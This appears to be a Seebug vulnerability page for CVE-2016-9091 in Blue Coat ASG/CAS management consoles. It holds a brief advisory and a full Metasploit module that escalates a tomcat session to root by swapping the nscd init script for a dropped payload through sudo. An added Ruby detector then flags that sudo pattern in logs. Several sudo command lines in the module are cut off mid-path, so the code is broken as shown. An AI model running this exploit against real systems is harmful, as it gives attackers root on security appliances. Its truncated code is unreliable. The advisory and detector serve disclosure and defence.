OS Command Injection Vulnerability in ASG and CAS (CVE-2016-9091)

Seebug SSV:92941
Published: 2017-04-13 00:00:00
Author: Root
Source: www.seebug.org
EPSS: 0.015 (Percentile 87.2%)

The Advanced Secure Gateway (ASG) and Content Analysis System (CAS) management consoles provide a web UI for appliance administrators to manage and monitor the respective appliance. Each management console provides limited functionality to administrators and does not provide them with access to the underlying operating system.

The ASG and CAS management consoles are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with the privileges of the management console service. The malicious administrator can also elevate their privileges and execute OS commands with root privileges.

This vulnerability can be exploited only through the ASG and CAS management interfaces. Blue Coat recommends that customers deploy the ASG and CAS appliances in a secure network and restrict access to the management interface. Not deploying the appliance in a secure network, or not restricting management interface access, increases the risk that the vulnerability is exploited.

Exploit module (Metasploit, Ruby):

require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
 
class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end
 
  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end
 
    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end
 
    return Exploit::CheckCode::Vulnerable
  end
  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end
 
    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"
 
    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    # TODO: handle timeouts; failures were observed to be inconsistent ("Exploit failed: Rex::TimeoutError Operation timed out").
 
  end
end
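The escalation chain in the module above (the tomcat service account using sudo to run the vendor script mv_troubleshooting.sh against /etc/init.d/nscd and against a payload dropped in a writable directory such as /var/log) leaves a distinctive trace in sudo's syslog output. The following detector is an added example, not part of the Seebug record or the module; the log lines, the host name and the destination path under /data/bluecoat/avenger/ui/logs/ are constructed samples, and the sudo line layout assumed is sudo's standard "USER : TTY=... ; PWD=... ; USER=root ; COMMAND=..." format.

```ruby
# Added example (not from the Seebug record or the module above): scan sudo
# syslog lines for the escalation step the module relies on. Alert when a
# web-console service account runs mv_troubleshooting.sh as root with an
# argument that is an init script or an .elf file in a writable directory.
SERVICE_ACCOUNTS = %w[tomcat].freeze
WATCHED_SCRIPT   = 'mv_troubleshooting.sh'
# Standard sudo syslog shape: "sudo:   USER : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_RE = /sudo:\s+(?<user>\S+)\s+:\s+.*?USER=(?<target>\S+)\s+;\s+COMMAND=(?<cmd>.*)$/

# Returns a hash for a sudo event, or nil for lines that are not sudo records.
def parse_sudo_line(line)
  m = SUDO_RE.match(line)
  return nil unless m
  argv = m[:cmd].split
  return nil if argv.empty?
  { user: m[:user], target: m[:target], script: File.basename(argv[0]), args: argv[1..] }
end

# Reasons a parsed sudo event should be alerted on; an empty array means benign.
def suspicious_reasons(ev)
  reasons = []
  return reasons unless SERVICE_ACCOUNTS.include?(ev[:user]) && ev[:target] == 'root'
  return reasons unless ev[:script] == WATCHED_SCRIPT
  ev[:args].each do |a|
    reasons << "init script used as move argument: #{a}" if a.start_with?('/etc/init.d/')
    reasons << "executable from writable dir: #{a}" if a.match?(%r{\A/(var/log|tmp|var/tmp)/[^/]+\.elf\z})
  end
  reasons
end

# Returns [[line, reasons], ...] for every line worth alerting on.
def scan(lines)
  lines.filter_map do |line|
    ev = parse_sudo_line(line)
    next unless ev
    r = suspicious_reasons(ev)
    [line, r] unless r.empty?
  end
end

# Constructed sample log: two malicious moves, one routine log move, one admin cp, one non-sudo line.
SAMPLE_LOG = [
  'Apr 13 00:00:01 asg sudo:   tomcat : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/sample_dest',
  'Apr 13 00:00:02 asg sudo:   tomcat : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/abcd.elf /data/bluecoat/avenger/ui/logs/sample_dest',
  'Apr 13 00:00:03 asg sudo:   tomcat : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /data/bluecoat/avenger/ui/logs/ui.log /data/bluecoat/avenger/ui/logs/sample_dest',
  'Apr 13 00:00:04 asg sudo:    admin : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/cp /etc/init.d/nscd /root/nscd.bak',
  'Apr 13 00:00:05 asg sshd[123]: Accepted publickey for admin from 192.0.2.10'
].freeze

scan(SAMPLE_LOG).each { |line, reasons| puts "ALERT #{reasons.join('; ')}\n  #{line}" }
```

Pairing this with a file-integrity check on /etc/init.d/nscd catches the case where the move succeeded but the sudo log was not forwarded off the appliance.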